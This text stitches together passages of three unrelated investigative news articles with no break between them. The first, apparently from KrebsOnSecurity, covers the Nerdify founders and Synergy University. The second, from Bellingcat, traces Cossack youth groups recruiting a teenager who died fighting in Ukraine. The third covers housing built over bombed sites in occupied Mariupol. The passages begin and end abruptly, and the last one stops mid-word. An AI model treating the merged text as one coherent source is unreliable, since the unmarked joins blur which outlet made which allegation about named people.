Around the time Perkon and Pokatilo launched Awesome Technologies, Perkon was building a social media propaganda tool called the Russian Diplomatic Online Club, which Perkon said would “turbo-charge” Russian messaging online. The club’s newsletter urged subscribers to install in their Twitter accounts a third-party app called Tweetsquad that would retweet Kremlin messaging on the social media platform.
Perkon was praised by the Russian Embassy in London for his efforts: During the contentious Brexit vote that ultimately led to the United Kingdom leaving the European Union, the Russian embassy in London used this spam tweeting tool to auto-retweet the Russian ambassador’s posts from supporters’ accounts.
Neither Mr. Perkon nor Mr. Pokatilo replied to requests for comment.
A review of corporations tied to Mr. Perkon as indexed by the business research service North Data finds he holds or held director positions in several U.K. subsidiaries of Synergy University, Russia’s largest private education provider. Synergy has more than 35,000 students, and sells T-shirts with patriotic slogans such as “Crimea is Ours,” and “The Russian Empire — Reloaded.”
The president of Synergy University is Vadim Lobov, a Kremlin insider whose headquarters on the outskirts of Moscow reportedly features a wall-sized portrait of Russian President Vladimir Putin in the pop-art style of Andy Warhol. For a number of years, Lobov and Perkon co-produced a cross-cultural event in the U.K. called Russian Film Week.
Synergy President Vadim Lobov and Filip Perkon, speaking at a press conference for Russian Film Week, a cross-cultural event in the U.K. co-produced by both men.
Mr. Lobov was one of 11 individuals reportedly hand-picked by the convicted Russian spy Marina Butina to attend the 2017 National Prayer Breakfast held in Washington D.C. just two weeks after President Trump’s first inauguration.
While Synergy University promotes itself as Russia’s largest private educational institution, hundreds of international students tell a different story. Online reviews from students paint a picture of unkept promises: Prospective students from Nigeria, Kenya, Ghana, and other nations paying thousands in advance fees for promised study visas to Russia, only to have their applications denied with no refunds offered.
“My experience with Synergy University has been nothing short of heartbreaking,” reads one such account. “When I first discovered the school, their representative was extremely responsive and eager to assist. He communicated frequently and made me believe I was in safe hands. However, after paying my hard-earned tuition fees, my visa was denied. It’s been over 9 months since that denial, and despite their promises, I have received no refund whatsoever. My messages are now ignored, and the same representative who once replied instantly no longer responds at all. Synergy University, how can an institution in Europe feel comfortable exploiting the hopes of Africans who trust you with their life savings? This is not just unethical — it’s predatory.”
This pattern repeats across reviews by multilingual students from Pakistan, Nepal, India, and various African nations — all describing the same scheme: Attractive online marketing, promises of easy visa approval, upfront payment requirements, and then silence after visa denials.
Reddit discussions in r/Moscow and r/AskARussian are filled with warnings. “It’s a scam, a diploma mill,” writes one user. “They literally sell exams. There was an investigation on Rossiya-1 television showing students paying to pass tests.”
The Nerdify website’s “About Us” page says the company was co-founded by Pokatilo and an American named Brian Mellor. The latter identity seems to have been fabricated, or at least there is no evidence that a person with this name ever worked at Nerdify.
Rather, it appears that the SMS assistance company co-founded by Messrs. Pokatilo and Perkon (Awesome Technologies) fizzled out shortly after its creation, and that Nerdify soon adopted the process of accepting assignment requests via text message and routing them to freelance writers.
A closer look at an early “About Us” page for Nerdify in The Wayback Machine suggests that Mr. Perkon was the real co-founder of the company: The photo at the top of the page shows four people wearing Nerdify T-shirts seated around a table on a rooftop deck in San Francisco, and the man facing the camera is Perkon.
Filip Perkon, top right, is pictured wearing a Nerdify T-shirt in an archived copy of the company’s About Us page. Image: archive.org.
Where are they now? Pokatilo is currently running a startup called Litero.Ai, which appears to be an AI-based essay writing service. In July 2025, Mr. Pokatilo received pre-seed funding of $800,000 for Litero from an investment program backed by the venture capital firms AltaIR Capital, Yellow Rocks, Smart Partnership Capital, and I2BF Global Ventures.
This past week, Mr. Lobov was in India with Putin’s entourage on a charm tour with India’s Prime Minister Narendra Modi. Although Synergy is billed as an educational institution, a review of the company’s sprawling corporate footprint (via DNS) shows it also is assisting the Russian government in its war against Ukraine.
Synergy University President Vadim Lobov (right) pictured this week in India next to Natalia Popova, a Russian TV presenter known for her close ties to Putin’s family, particularly Putin’s daughter, who works with Popova at the education and culture-focused Innopraktika Foundation.
The website bpla.synergy[.]bot, for instance, says the company is involved in developing combat drones to aid Russian forces and to evade international sanctions on the supply and re-export of high-tech products.
A screenshot from the website of synergy[.]bot shows the company is actively engaged in building armed drones for the war in Ukraine.
KrebsOnSecurity would like to thank the anonymous researcher NatInfoSec for their assistance in this investigation.
Update, Dec. 8, 10:06 a.m. ET: Mr. Pokatilo responded to requests for comment after the publication of this story. Pokatilo said he has no relation to Synergy nor to Mr. Lobov, and that his work with Mr. Perkon ended with the dissolution of Awesome Technologies.
“I have had no involvement in any of his projects and business activities mentioned in the article and he has no involvement in Litero.ai,” Pokatilo said of Perkon.
Mr. Pokatilo said his new company Litero “does not provide contract cheating services and is built specifically to improve transparency and academic integrity in the age of universal use of AI by students.”
“I am Ukrainian,” he said in an email. “My close friends, colleagues, and some family members continue to live in Ukraine under the ongoing invasion. Any suggestion that I or my company may be connected in any way to Russia’s war efforts is deeply offensive on a personal level and harmful to the reputation of Litero.ai, a company where many team members are Ukrainian.”
Update, Dec. 11, 12:07 p.m. ET: Mr. Perkon responded to requests for comment after the publication of this story. Perkon said the photo of him in a Nerdify T-shirt (see screenshot above) was taken after a startup event in San Francisco, where he volunteered to act as a photo model to help friends with their project.
“I have no business or other relations to Nerdify or any other ventures in that space,” Mr. Perkon said in an email response. “As for Vadim Lobov, I worked for Venture Capital arm at Synergy until 2013 as well as his business school project in the UK, that didn’t get off the ground, so the company related to this was made dormant. Then Synergy kindly provided sponsorship for my Russian Film Week event that I created and ran until 2022 in the U.K., an event that became the biggest independent Russian film festival outside of Russia. Since the start of the Ukraine war in 2022 I closed the festival down.”
“I have had no business with Vadim Lobov since 2021 (the last film festival) and I don’t keep track of his endeavours,” Perkon continued. “As for Alexey Pokatilo, we are university friends. Our business relationship has ended after the concierge service Awesome Technologies didn’t work out, many years ago.”
This is Олег Монин (Oleg Monin), who took Berkut’s oath four months earlier. Through this veiled Cossack Youth Organisation, he trained in combat tactics with returned fighters and transitioned from pretend to real weapons.
Within a year, Oleg abandoned his studies and enlisted in БАРС-15 (BARS-15), a Cossack Volunteer Battalion fighting in Ukraine.
By Feb. 10, 2025 Oleg was dead. He died aged 19, less than four months after deployment in Ukraine.
Cossack societies, organisations, and even military units provide an identity that is indigenous to Russia, Dr Marcello Fantoni, Visiting Assistant Professor at Miami University, told Bellingcat. This identity is “rooted in ‘traditional’ values, martial prowess, military readiness, orthodox religiosity and a culture not influenced by the ‘corrupting’ West,” Fantoni added via email. This is why “education is central to the overall enterprise”.
Oleg’s story demonstrates how the Cossacks drive young people from a school club to a war zone and enable a state-sponsored alternative mobilisation force.
WHO ARE THE RUSSIAN COSSACKS?
The Cossacks played an important role in the formation of the Russian Empire. They lived in communities called hosts on the edges of the empire. They operate under a military hierarchy ruled by a chief, the Ataman. Due to their loyalty to the Tsar, the Cossacks were repressed by the Bolsheviks after 1917.
Credit: Journal “Chronicle of War”, 1915; Nicholas II among officers
When the Soviet Union collapsed in 1991, the Cossacks’ descendants called for a “rebirth”.
In 2005, a bill submitted by President Vladimir Putin allowed members of registered Cossack organisations to serve in military units and police forces.
Credit: tamvesti.ru
New hosts were created in traditionally non-Cossack lands with a variety of institutions to direct them. In 2018, the government united them in the “All-Russian Cossack Society”. Putin tries to marginalise the traditional Cossack groups, analyst Paul Goble told Bellingcat, while the ones “he has created for his own purposes” play a “major role in military and patriotic education”.
Credit: Kremlin
Only 8 of Russia’s 83 recognized Federal Subjects do not have a registered Cossack Host. In 2018, the Black Sea Cossack Host of Crimea entered the register. The peninsula has been under Russian occupation since 2014. The Cossack legacy is also vitally important to Ukrainian identity.
There are new hosts in the occupied Ukrainian territories of Kherson, Zaporizhzhia, Donetsk, and Luhansk.
Russian Cossack organisations have been “very active within the occupied Ukrainian regions,” Dr Fantoni told Bellingcat. They “recruit local residents and then deploy them for cultural and military purposes,” allowing Russia “to contest and even co-opt a central tenet of Ukrainian national identity – Cossackdom,” he said.
The national “All-Russian Cossack Society” (VSKO) was created in 2018, and in 2019 the State Duma gave Russian President Vladimir Putin exclusive authority to appoint its national Ataman.
At the top of the VSKO is Ataman Vitaly Kuznetsov, a Cossack General. Kuznetsov was appointed in November 2023, succeeding the first-ever national Ataman, Nikolai Doluda, then 70 years old and a sanctioned individual.
Kuznetsov has also become a leading Cossack interlocutor with the Russian state, including with Dmitry Mironov, assistant to President Putin and Chair of the Council for Cossack Affairs, and with Leonid Pasechnik, head of the Luhansk People’s Republic. Kuznetsov thanked Pasechnik in June for helping create three Cossack Cadet Corps in the occupied region.
According to Kuznetsov, the VSKO priorities are “development of military Cossack societies in all directions: education, culture, history, and most importantly, youth. Everything through youth.”
EVERYTHING THROUGH YOUTH
Cossack education can be divided into primary, secondary, and tertiary levels, all with the goal of promoting a unified system. There are Cossack schools and regular schools with a Cossack affiliation. Data from 2022 claim there were just under 2000 such institutions with around 210,000 students, but recent claims point to over 300,000 students.
Oleg’s story demonstrates how young people outside formal Cossack education can still get pulled in. It also shows that the Cossacks are but one of several interlaced strategies for “military-patriotic” education.
Oleg grew up in Saratov.
Credit: Image of youth practicing putting on a gas mask, posted on VKontakte by Lyceum N.3.
He studied in Lyceum N.3, a state-funded educational institution in Saratov. The school often promotes events like the national Zarnitsa competition, which includes activities like “putting on gas masks” or “sniper games” for third graders. The school’s military club “Fakel” acts as an intermediary for these events and other nationwide military education initiatives such as the 24-hour-long Avangard training for tenth graders.
In 2024, Natalia Saprykina, the director of Lyceum N.3, was awarded a Letter of Gratitude for her “contribution to the patriotic education of the younger generation” by a Deputy of the Regional Duma.
Oleg graduated from high school in 2023 at the age of 17.
In the same year he enrolled in InPIT, a higher education institution of the Saratov State Technical University. By November Oleg had turned 18 and was wearing military fatigues and practising survival skills alongside other candidates of a “military-patriotic” student association named Berkut, at another local university, the Saratov State Law Academy (SSLA).
Though Berkut is not explicitly a Cossack organisation, we established several connections between the head of Berkut, Alexander Andreevich, and Cossack organisations. As we’ll see, Andreevich was present at multiple military-style training camps that Oleg took part in.
Neither Berkut’s VKontakte nor Telegram channel descriptions mention the Cossacks. The association’s official objectives are “forming a positive image of military service” and “popularisation of service in the Russian army and law enforcement agencies”. It is headed by Alexander Andreevich.
However, some of Berkut’s videos include the banner of a Молодёжная казачья организация (Cossack Youth Organisation). A Telegram post by Andrey Fetisov, the Saratov District Ataman, refers to Berkut as a “Cossack Youth Movement”.
Even though Berkut (left) shares a name and eagle iconography with a notorious Ukrainian special police force (right), part of which defected to Russia during the occupation of Crimea in 2014, Bellingcat found no link between the two organisations.
FROM WAR GAMES TO REAL WEAPONS
By December 2023, nearing the end of the first semester, Oleg and the other candidates took the Berkut oath, making them official members. Oath-taking ceremonies are “invented traditions” among Cossack forces.
Atop the dais stand senior members of Berkut, including the head of the organisation, Alexander Andreevich.
Andreevich is an active Cossack who has been working under the guidance of District Ataman Andrey Fetisov since at least April 2023. More recently, in January 2025, they were both delivering a lesson to Cossack children for Yunarmiya, exemplifying the overlapping network of youth militarisation initiatives.
In August 2024, Andreevich attended the iVolga Cossack Youth Festival, where he met Kuznetsov. They are the only two people featured speaking in an official video.
Andreevich also led Oleg to two military-inspired events in April 2024. Five days later they went to a training that included trench tactics and simulated helicopter jumps.
Since 2023, Oleg often wore a distinctive yellow and red “Скорпион” (Scorpion) call sign patch on his chest when wearing military fatigues, which distinguishes him from other youth at the events. That and other distinctive features identify him even with a mask or goggles.
Bellingcat was able to geolocate this place to a Rosgvardia training ground on the outskirts of Saratov. Notably, the trenches are not visible on Google Earth but are on Yandex Maps, which has more recent imagery for the region.
As is Oleg Mysov, another returned fighter who also engages in “patriotic education of youth” events. Both have attended Cossack events. Even though in this photo they are holding the Volga Cossack Host flag, Bellingcat could not clearly identify them as Cossacks.
Bellingcat geolocated it to a military training ground in Samara, the same location where other Cossack recruits trained before deploying to BARS-15. Fetisov himself shared photos of this training ground two weeks after stepping down as Ataman to join BARS-15. Andreevich is on the left and Oleg on the right in this photo.
They used real weapons this time. A video montage shows participants firing live rounds.
This is a photo that includes Oleg, Fetisov, and Andreevich. The first media we found for this event is from early September, which is consistent with the sun position in this photo and the grass patches seen in satellite imagery from early September 2024.
Bellingcat contacted Kuznetsov, Fetisov and Andreevich to ask about their roles in the Cossack community, but they haven’t responded.
This is the last time Bellingcat was able to trace Oleg’s whereabouts with open sources before he joined BARS-15.
VOLUNTARY RECRUITMENT
Many countries have a volunteer reserve system for getting more soldiers in times of war. In Russia, the system is known as BARS, created in 2015 and intensified in 2021. All BARS fighters sign a contract with the Ministry of Defense and get paid.
Mapping the geolocated positions of these units in the UAControlMaps Project dataset reveals widespread areas of operations. BARS Battalions are often reorganised. Estimates put the total number so far at over 30 BARS Battalions, and 10 of them have overt Cossack affiliation. Cossacks also operate as detachments in other military structures.
By their own reckoning, in February there were more than 18,500 Cossacks on the front lines in Ukraine. In May the first-ever national Ataman, Nikolai Doluda, gave a higher figure of 46,000 Cossacks.
As of 2024, British Professor Rod Thornton estimated that BARS constitute some 10-30,000 troops in Ukraine, 15% of the total invasion force.
The Mediazona project tracks individual Russian losses in Ukraine and publishes bi-weekly reports. As of Nov. 21, 2025, they identified 149,241 publicly named casualties, Oleg among them.
The project also tracks volunteer casualties. Deaths of volunteer fighters constituted 12.8% of losses in 2022 and 21.9% in 2023. In 2024 they more than doubled to 45.7%. As of Nov. 21, verified deaths of volunteer fighters for 2025 were at 42.8%.
BARS-15
BARS-15 is a Cossack battalion created on May 15, 2022, and named Ермак (Yermak) after a historical Ataman. Originally composed of Cossacks from multiple hosts, mainly Volga and Orenburg, it now draws its members from the Volga Host only.
Credit: All-Russian Cossack Society
The panel reads Black Hussars. Oleg is on his knee in front of Andreevich, wearing his distinctive
“Scorpion” patch.
Credit: VKontakte @svpo_berkut
The number of active Cossack fighters in BARS-15 is reportedly 400, a number echoed by a former Commander, with other sources saying over 900 volunteers have passed through as of September 2024. They reportedly took part in the invasion of Avdiivka among other combat activities in Ukrainian cities in both Donetsk and Luhansk.
Credit: VKontakte @vvko_russia
One of its former members is Andrey Fetisov, who temporarily stepped down as Saratov District Ataman and joined BARS-15 between approximately November 2023 and June 2024.
Credit: Telegram @izvestia64
In April 2024, Fetisov received a Medal for Bravery from Vitaly Kuznetsov, the national Ataman. Within six months, Fetisov would be taking Oleg to the BARS-15 training camp.
Credit: Telegram @izvestia64
There are many reasons why people are motivated to join Cossack groups, Dr Fantoni told Bellingcat,
adding that these motivated individuals “are the driving force” behind militarisation. “Some do it
out of patriotic motivations, others for political, economic or individual status gain, some even
because this can protect oneself from future mobilisation to an actual fighting unit,” he said.
This image first appeared on Oleg’s obituary posted by Fetisov. The vehicle, road, and equipment are consistent with those used by other fighters with the Black Hussars around February 2025.
According to recruitment posts, BARS-15 training takes three weeks. A recent study found that to be the norm in Russia’s military while also labelling training as “low-quality and ineffective”.
Bellingcat reached out to Oleg’s parents. His mother said she couldn’t speak about Oleg’s death; it still hurts too much.
Additional research by Timothy B, Afton Briones, Sarah Grossman, Alexandra Malikova, Mitchell Polman, Olivia Gresham, Bonny Albo, Adam Arthur and Robert Chapman of the Bellingcat Volunteer Community.
Youri van der Weide and Aiganysh Aidarbekova contributed to this report.
Satellite images are courtesy of Yandex, Maxar, Airbus, MapBox and Google Earth.
Co-funded by the European Union. Views and opinions expressed are those of the author(s) only and do not
necessarily reflect those of the European Union or the European Health and Digital Executive Agency
(HADEA). Neither the European Union nor the granting authority can be held responsible for them.
It’s the second time Moreva has lost her home. She fled to Mariupol from Makiivka, an industrial
city near Donetsk, after Russia occupied Donbas in 2014. The 57-year-old rebuilt her life in the
port city, working as a professor in Mariupol State University’s ecology department and running an
animal shelter in her spare time.
When Russia launched its full-scale invasion of Ukraine, her husband was in Donetsk and their adult
daughter was living near the town of Bucha, where unarmed civilians were massacred.
“I was preparing lectures and my daughter called me early in the morning and said: ‘Mum, we are
being bombed.’ I said: ‘Vika, are you kidding? What do you mean you are being bombed?’ At that
moment it was still quiet in Mariupol.”
Soon after, the phone lines went down and Moreva lost all contact with her family.
Viktoriia Moreva at the Sea of Azov, Mariupol
On the day the airstrikes began in Mariupol, Moreva said she ran into the street with her neighbours
to wave at a drone overhead. “We thought that, seeing civilians, they would not bomb the area,” she
said. “But within a few minutes, the whole district was completely destroyed.”
Moreva described the harrowing early days of the siege of Mariupol: water, gas and electricity
supplies severed; Russian tanks roaming the city; bodies in the streets; children shot in fleeing
cars; screams from under the rubble.
“All the authorities had left, abandoned the city. It was mostly civilians who remained, including
many children, because there was no evacuation and no green corridors. We had nothing – no rescue
services, no ambulances, no fire department, absolutely nothing.”
Viktoriia Moreva’s apartment building after it was bombed
Moreva said at least seven of her neighbours were killed when her apartment block was repeatedly
bombed. The ones who survived cannot go home because the building has since been demolished. Of
those who remain in the occupied city, she knows of only one, an old man, who was rehoused. She said
his case was reported as a “success story” on pro-Russian social media channels.
Across the city, Moreva said the bodies of many people who died in their homes have never been
found. “People were trapped under the rubble when the buildings collapsed,” she said. “They
suffocated or died from cold, hunger and illness because they couldn’t get out, and no one could
reach them. Many were literally buried alive.”
Often, she said, the bodies that were recovered were buried in the courtyards of the apartment
buildings. “People covered the bodies with soil, and when the ground was frozen, they could only
cover them lightly, wrapping them in carpets or blankets.
“In Mariupol, now, they are building houses on bones. They are building so that people cannot
return.”
Viktoriia Moreva with her husband Alexander at Glenveagh National Park in Ireland
Moreva, who was eventually reunited with her family, now lives in Ireland. She still has the keys to
her apartment, “to the door that’s no longer there”. If she ever returns to Ukraine, it will not be
to the adopted city that she loved. “Even if I dreamed of getting there, I cannot enter,” Moreva
said. “I have nothing left in Mariupol.”
Warning: This report contains graphic imagery.
A new apartment in the Mirapolis complex comes with panoramic views of the city. The property
developer boasts easy access to shops and schools, with colourful mock-ups showing families and
manicured gardens. “If you’ve been thinking about owning your own apartment by the sea,” it says,
“now is the best opportunity to realise your dream.” Prices range from about €75,000 to €110,000.
The Mirapolis estate is just one of many “new” residential housing complexes under construction
across Mariupol, the Ukrainian port city subjected to some of the worst horrors of Russia’s
invasion.
When the apartment blocks that originally stood here were bombed in March 2022, the residents of
Building 127 sheltered in the basement. Children were among the 90 people killed in the attack,
according to Mariupol’s Destruction and Victims Map, which has documented the devastation across the city. At a nearby burial ground, graves were marked with crosses made from scrap wood.
Credit: REUTERS
The four high-rises on the western edge of Mariupol were destroyed, and then torn down. Now, they
are being rebuilt.
Credit: REUTERS
Across the road is the new Nevsky residential estate, one of the sites pro-Kremlin media has used to
paint a picture of life returning to normal in Mariupol, which has been under Russian occupation for
more than three years. In a video of Russian president Vladimir Putin meeting residents in the
neighbourhood in 2023, a woman in the background can be heard shouting “This is all a lie!”
The damaged buildings were leveled by 2024.
Credit: Google Earth / Maxar, Google Earth / Airbus
A Bellingcat investigation has identified 23 multi-storey housing complexes – more than 50
buildings with at least 6,000 apartments – being built in the ashes of Mariupol and advertised
for sale, with low interest rate loans, to Russian citizens. Construction of the first buildings
has been completed; new residents have already moved in. Meanwhile, many of the original
Ukrainian owners cannot return home.
Satellite imagery shows the buildings before Russia invaded Ukraine in 2022. By the
summer of 2024, all had been demolished, with some already being rebuilt.
Russia launched its full-scale invasion of Ukraine on Feb. 24, 2022, minutes after
Vladimir Putin announced the start of a “special military operation” on state television.
Credit: Al Jazeera
The strategically important southeastern city of Mariupol was surrounded within days. Homes and
infrastructure were shelled.
Credit: Associated Press
The Russian bombardment cut food, water, power and heat to the besieged city. Internet and phone
lines went down.
Credit: REUTERS/Alexander Ermochenko
Most of Mariupol’s 430,000 residents were forced to flee.
Credit: REUTERS/Alexander Ermochenko
By the time the brutal 86-day siege ended, an estimated 25,000 people had been killed,
including thousands who died when their homes were bombed. Many are buried in mass
graves. The United Nations said
90 percent of Mariupol’s residential buildings were damaged or destroyed.
As part of its post-siege reconstruction of the coastal city, Russia deployed workers to
demolish what was left.
And to rebuild. In the months after Mariupol was razed, the new authorities released a plan to “restore” the city and grow its population to 500,000 over the next decade.
It is part of the Russification of Mariupol: streets have been renamed, Ukrainian monuments
removed, and murals painted over. Access to Ukrainian websites has been blocked and Russian
programmes are shown on television. Mariupol and St Petersburg are now “twin cities”.
Russia is painting a picture of a city restored, but many locals still live in perilous
conditions, including some in half-destroyed buildings.
Credit: REUTERS/Sergei Ilnitsky
“A Step into a Bright Future”
The largest of the 23 developments is the Leningrad Quarter, a 10-minute drive from the shore of the
Sea of Azov. The sprawling residential complex, in Mariupol’s north-east, includes at least 11
high-rises along with car parking, recreation areas and children’s playgrounds. Last week, another
phase of the project was released, with four new apartment blocks listed online. “We are building
the future of Russia!” the website for the development says. The apartments are listed for sale with
“preferential mortgages” at a 2 percent interest rate over 30 years with Russian banks. Mortgage rates in
Russia are, on average, about 20 percent.
Rewind three years. The Leningrad Quarter was a site of death and destruction. People fell from
their windows when the original building at 81 Metallurgist Avenue was shelled and engulfed in
flames, according to posts in a Telegram channel that documented the lives lost here. A
great-grandmother was killed when her apartment in Building 77 burned, her family said. Another
woman died while hiding in the basement of Building 121. “Forgive me, mum, for not saving you,” her
daughter wrote. Near Building 83, someone posted a photo of a 36-year-old woman’s grave, with fresh
flowers and a makeshift plaque. “I don’t know how she died,” they said.
Credit: TASS
Residents who survived the siege of Mariupol, or have since returned to the captured city, face the
challenge of finding somewhere to live. How can they prove ownership when property records are
missing or have been destroyed? To claim their home in the occupied territory – to prevent an “ownerless” property from
being confiscated – they must become Russian citizens and present, in person, with ownership
documents.
Credit: Mariupol’s Destruction and Victims Map
Some residents – including the people who lived in the original Soviet-era buildings at the
Leningrad site – have posted videos to social media, cautiously appealing to Putin and the
Russian-installed authorities in Mariupol to intervene.
“We don’t have the possibility to buy the housing with [a] mortgage, as many of us are
pensioners or have lost practically everything,” one woman said. Another said: “In 2022 we
lost housing, property, and many of us also our loved ones.”
Residents complain about being unable to move back to the sites where they used to live, and
say they were misled about access to compensatory housing. They say many people across the
city are still homeless or forced to rent.
Those who can prove property ownership say the financial compensation being offered is at a
rate far lower than market value. Authorities have said they will compensate residents who
lost their homes in the war, but this is capped at about €12,000 for
a one-person household and €16,000 for a two-person family. The cheapest flats advertised in
the rebuilt apartment blocks start at about €45,000 for a 20 m² studio.
“We are not asking for favours, but for adherence to the law and promises made,” one woman
said. “We ask to be given the housing we were promised, not an offer of [a] mortgage to our
own house or someone’s ‘ownerless’ apartment.”
It’s not only people from the reconstructed high-rises advertised for sale who are impacted. In one
video, a woman can be heard sobbing as she films the hollowed-out shell of a building on the western
edge of Mariupol. This apartment block was demolished but has not been rebuilt.
For Viktoriia Moreva, who lived on the first floor of the building, there’s nothing to go back to.
Moreva was in a friend’s home nearby when airstrikes hit her home in March 2022. She watched it
burn.
Viktoriia Moreva in Ireland
“We just couldn’t understand it, why the shelling started with the houses,” she
said. “It was a quiet residential area. There was a school and two kindergartens in
this area. No soldiers were in the houses. Only civilians.”
“Flagrant Violations of International Law”
Professor Balakrishnan Rajagopal, the UN’s Special Rapporteur on the right to adequate housing, said
Russia’s attacks on homes and residential areas in Mariupol were “grave war crimes and crimes
against humanity”.
He told Bellingcat that the scale and intensity of destruction, mass displacement of residents and
deaths of civilians constituted “one of the most flagrant violations of international law” and were
“comparable to some of the worst examples from World War II”.
“Mass destruction of homes during conflict as in Mariupol are acts of ‘domicide’, as I proposed to the UN General Assembly
in 2022, and may constitute war crimes, crimes against humanity or even genocide, depending on
facts,” he said.
Professor Rajagopal said the housing policy measures implemented by Russia were contrary to the
basic rules of international law, such as the prohibition against taking private property during
occupation under the laws of war, including the Hague regulations.
“What appears to be happening is in fact an annexation of Ukrainian territory, through occupation
and creation of new property rights which excludes the former owners,” he said. “Declaring a
property ‘ownerless’ or ‘abandoned’ in order to annex it is an old colonial legal trick that settler
colonial states have used for hundreds of years when such property, usually belonging to native
populations, was declared ‘terra nullius’ (no person’s land) in order to acquire it, but is
considered to be completely contrary to modern international law.”
“What Russia is attempting is to go back to medieval practices and discredited norms such as ‘terra
nullius’ that Russia itself, as part of the Soviet Union, actively opposed for decades.”
A 2023 analysis by the Kyiv School of Economics estimated the damage to Ukraine’s housing stock to
be almost $56 billion. Mariupol was one of the worst-affected cities: Ukrainian authorities said
more than 11,000 homes were destroyed and tens of thousands more were damaged. Half of the 2,600
multi-storey residential buildings were reduced to rubble.
Credit: REUTERS
Over a large block that was decimated in central Mariupol, seven separate residential complexes are
nearing completion. Among them are four gemstone-named developments ranging from nine to 15 storeys.
Three apartment blocks in the centre of the “resort town” – the Residence I, Residence II, and
Residence III – are due to be completed by the end of the year.
Like the other estates analysed by Bellingcat, these apartments are listed on Russian real estate
websites with low-interest loans.
The advertisements target families with children: “Everything is close by: the sea, a park, schools,
medical facilities and a church,” says one for the new Residence III. They don’t show what was here
before.
The tree-lined street where Residence III now stands became a graveyard during the siege.
Credit: REUTERS / Alexander Ermochenko
A short walk away is Hospital No. 3, the children’s and maternity hospital bombed by Russian forces
on March 9, 2022. “Everything was destroyed in one second,” said Elena Karas, a nurse who was caring
for 13 premature babies on the third floor. “I didn’t ever think they could bomb our hospital. Not a
hospital. You would think it’s a safe place,” she told The New York Times.
Ukrainian authorities said three people were killed and more than a dozen others were injured in the
attack, which President Volodymyr Zelensky said was evidence of genocide.
Iryna Kalinina, the wounded pregnant woman in this photograph, and her unborn baby – named Miron,
meaning “peace” – both died.
Credit: Associated Press / Evgeniy Maloletka
Across the road from the hospital, construction workers are building the Horizon complex, two
“comfort class” high-rises due to be finished by 2026.
A block behind the site is the Cypress complex. The residential building that originally stood here
was bombed and later torn down. Advertisements for Cypress – “a new destination for those who value
prestige, comfort, and reliability” – tout the 15-storey building’s proximity to Hospital No. 3.
On March 16, 2022, a Russian airstrike hit Mariupol’s drama theatre.
The grand Soviet-era building had become the city’s main bomb shelter, with hundreds of civilians
seeking refuge inside. Outside, the word “CHILDREN” had been spelled out on the ground in giant
Cyrillic letters. As many as 600 people reportedly died in the attack.
Credit: Google Earth / Airbus
Less than 500m from the theatre is the original site of the House with the Clock, a historic
landmark in the city’s centre. Noted for its clock tower, the 1950s building served as a meeting
place for the city’s residents.
In the months before Russia’s invasion, its facade had been restored and a new clock installed.
Credit: House with the Clock / Google Maps
The building was shelled during the siege and demolished after Mariupol fell.
Credit: Mariupol’s Destruction and Victims Map
A new multi-storey complex with studio, one- and two-bedroom apartments was built on the site in
late 2024. “The House with the Clock was a recognisable symbol of Mariupol, but was damaged during
the war,” the property developer’s website says.
As is the case with most new complexes analysed by Bellingcat, its original address was changed
under occupation – a tactic Mariupol’s residents say further complicates their claim to housing. The
House with the Clock was on Myru Avenue – “Avenue of Peace”. The road has since been renamed Lenin
Avenue, after the former Soviet leader.
Farther east is the Azovstal Iron and Steel Works plant, where Mariupol’s last defenders surrendered on May 20, 2022.
Credit: Cover Media via REUTERS
Beyond the Azovstal steelworks are four new residential developments: the Olympic, Left Bank,
Zhukova and Designer’s House Mari, a seven-storey “business-class” complex “inspired by the sandy
coast”.
The bombed-out building seen in this footage is where Designer’s House Mari is being built.
Credit: Defense of Ukraine
Polished advertisements for the new building show it will feature landscaped courtyards and a
24-hour concierge service. Prices for a two-bedroom apartment are listed for about €130,000.
Ukrainian journalist Mstyslav Chernov and his Associated Press colleagues were trapped in Mariupol
during the first weeks of the siege.
The last international journalists to remain in the city, they captured
some of the most defining – and haunting – images of the war.
The crew reported from across the charred city, including in Mariupol’s north-west, near the new
655-apartment Mirapolis complex. In this area, four new complexes are also under construction.
“This is where your story begins,” a website for the Azure Coasts development says. Among the people
killed here in March 2022 was an elderly man. “He lies there under the rubble,” his granddaughter
posted on Telegram.
An apartment building on Kuprina Street promises its new residents “comfort, security and
affordability”. A video filmed nearby after the original buildings were bombed shows unburied bodies
on the grass, carefully wrapped in sheets.
Credit: Mariupol’s Destruction and Victims Map
Maple Alley, a complex with 10 apartment blocks, is featured in a Russian YouTube video with the
caption: “Dreaming of an apartment by the sea with a preferential mortgage?” It is being built where
a mother and her son were buried with their neighbours during the siege.
Credit: Mariupol’s Destruction and Victims Map
This high-rise, advertised as having children’s playgrounds and being close to a kindergarten, is on
Troyiczka Street, which has been renamed to commemorate the USSR.
Credit: Mariupol’s Destruction and Victims Map
The UN’s Office of the High Commissioner for Human Rights (OHCHR) has said
that Russia’s legislation on “abandoned property” in occupied Ukraine violates international humanitarian
law prohibiting the unlawful confiscation of property, affecting both the right of displaced people to
return to their homes and the right to adequate housing.
The Institute for the Study of War (ISW) said Russia was engaged in a “large-scale campaign” to inventory
real estate in occupied parts of Ukraine, including Mariupol, with the intention of nationalising and
seizing property. Karolina Hird, a national security fellow at ISW, said the campaign has two main aims: to
generate profit for the Russian state and to repopulate occupied areas with Russian citizens and residents
loyal to the regime.
Hird said Russia’s bill to standardise and codify the mass nationalisation of “ownerless” property in
occupied Ukraine contains a provision for allocating nationalised residential real estate to government
officials, military and law enforcement personnel, doctors and teachers. The properties are often offered to
Russians at premium rates, she said, as a financial incentive to attract relocation to occupied regions.
“The property nationalisation campaign therefore supports the Russian effort to lend legitimacy to its
illegal occupation by creating the impression that occupied areas are predominantly populated by Russian
citizens. The fact that Ukrainians who wish to reclaim their property from Russian nationalisation schemes
must have Russian documentation further supports this campaign.”
As of Aug. 2025, Russia’s real estate registration agency Rosreestr reported that it had registered 550,000
properties in occupied Ukraine as “ownerless”.
Hird said the impact on the original owners and residents of seized property can be severe. “Russia uses its
ownership of the seized property as a coercive bargaining tool, basically trying to force residents to
return to occupied areas and receive Russian documentation and face the horrors and challenges of living
under occupation if they wish to retain their property,” she said.
“Property seizure also represents a loss of control for the original residents, who have no mechanism with
which to dispute its allocation to Russian citizens or regime loyalists. Russia’s longer-term aim is to make
the reintegration of occupied territories seem infeasible to Ukrainians, and the seizure of homes and
apartments significantly complicates the concept of future reintegration.”
Ilvija Bruge, Beau Donelly and Miguel Ramalho contributed to this article.
Image Credits: Reuters, Associated Press, Al Jazeera, EFE, Mariupol’s Destruction and Victims Map, First
